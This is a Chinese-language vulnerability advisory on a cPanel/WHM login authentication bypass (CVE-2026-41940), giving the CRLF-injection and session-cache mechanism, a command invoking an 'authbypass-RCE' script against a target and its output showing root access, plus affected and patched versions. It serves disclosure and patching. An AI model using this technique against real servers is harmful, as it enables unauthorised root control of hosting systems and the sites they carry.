cPanel/WHM登录流程认证绕过CVE-2026-41940
cPanel 和 WHM 是闭源商业付费的服务器虚拟主机管理面板,专为 Linux 服务器设计,是全球主机商、建站服务商常用运维管理套装。
一、基本情况
cPanel 和 WHM 是闭源管理面板,WHM 管整台服务器,cPanel 管单个网站账号,一套组合实现服务器到建站全可视化商业托管运维。

WHM 是服务器级别的管理面板,主要给服务器管理员/主机商用,cPanel是网站/用户级别控制面板,主要给网站所有者或普通用户用。
栋科技漏洞库关注到 cPanel和WHM登录流程中的认证绕过漏洞,该漏洞现在已经被追踪为CVE-2026-41940,漏洞CVSS 3.1评分 9.8。
二、漏洞分析
CVE-2026-41940是cPanel/WHM 认证绕过漏洞,攻击者可以通过构造特殊请求绕过身份验证机制,获取控制面板的未授权访问权限。
具体来说,这是一个存在于 cPanel 和 WHM 登录流程中的身份认证绕过漏洞,由于登录流程中的会话加载与保存机制存在逻辑缺陷。
通过Basic认证头在密码字段注入CRLF字符并利用缺少ob(对象)部分的会话cookie避免密码编码,将恶意键值对写入原始会话文件。
随后触发token_denied 流程,使系统重新解析该文件并将注入的 hasroot=1、user=root等记录提升至JSON缓存,从而绕过密码验证。
该检测特征生成工具用于验证 cPanel/WHM 环境是否存在最新的认证绕过漏洞。
针对存在漏洞的实例进行测试:
python authbypass-RCE.py --target https://target:2087/
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py
(*) cPanel/WHM Authentication Bypass - Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-Pending]
[0] hostname =
[1] minting a preauth session...
session base = :vQ2WC5Bexp0oFSa7
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
HTTP 307, leaked token = /cpsess5691070609
[3] firing do_token_denied to propagate raw -> cache...
HTTP 401, gadget fired
[4] verifying we're WHM root...
/json-api/version -> HTTP 200 {"version":"11.110.0.89"}
三、影响范围
cPanel & WHM < 11.118.0.63
cPanel & WHM < 11.132.0.29
cPanel & WHM < 11.110.0.97
cPanel & WHM < 11.126.0.54
WP Squared < 11.136.1.7
cPanel & WHM < 11.134.0.20
cPanel & WHM < 11.136.0.5
四、修复建议
cPanel & WHM ≥ 11.118.0.63
cPanel & WHM ≥ 11.132.0.29
cPanel & WHM ≥ 11.110.0.97
cPanel & WHM ≥ 11.126.0.54
WP Squared ≥ 11.136.1.7
cPanel & WHM ≥ 11.134.0.20
cPanel & WHM ≥ 11.136.0.5
五、参考链接
管理员已设置登录后刷新可查看